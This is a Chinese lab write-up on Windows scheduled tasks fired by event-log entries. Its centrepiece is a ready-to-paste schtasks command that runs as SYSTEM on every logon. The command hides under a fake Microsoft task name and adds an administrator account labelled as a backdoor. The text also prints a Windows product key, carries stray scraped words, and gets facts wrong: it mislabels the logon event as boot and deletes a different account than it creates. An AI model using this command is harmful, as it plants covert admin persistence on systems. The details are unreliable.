1、任務要求安全
設計一個以開機、關機事件爲觸發條件的計劃任務,實現:ide
一、開機時新建一個用戶ui
二、關機時刪除用戶spa
2、解決步驟命令行
(一)實驗環境搭建設計
事件觸發的命令是schtasks。日誌
利用schtasks完成的功能主要是:利用肯定的日誌事件觸發net user命令,以達到新增一個管理員帳戶的目的。 blog
若是利用傳統的at命令,首先沒法用日誌事件觸發,其次須要執行多條命令行時,只能將它們編寫成.bat的批處理文件進行處理。事件
因爲要用到事件觸發,xp沒有這個功能,因此要新建一個win7的虛擬機。cmd
Win7激活祕鑰爲YKHFT KW986 GK4PY FDWYH 7TP9F
(二)開機建立用戶
Schtasks的用法描述:
容許管理員建立、刪除、查詢、更改、運行和停止本地或遠程系統上的計劃任
務。
參數列表:
/Create 建立新計劃任務。
/Delete 刪除計劃任務。
/Query 顯示全部計劃任務。
/Change 更改計劃任務屬性。
/Run 按需運行計劃任務。
/End 停止當前正在運行的計劃任務。
/ShowSid 顯示與計劃的任務名稱相應的安全標識符。
/? 顯示此幫助消息。
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
SCHTASKS /ShowSid /?
開機事件的事件ID爲4624,所以代碼以下:
schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"
直接在命令行窗口下輸入這行代碼便可。
重啓的時候有登陸窗口,緣由是關機的時候帳戶未刪。
(三)關機刪除用戶
經查詢關機事件ID爲1074。
代碼以下:
schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"
關機以前先檢查一下帳戶狀況
重啓以後,結果以下圖所示,帳戶已被刪除。
開機後,再輸入net user,能夠看到帳戶在開機以後也創建成功了。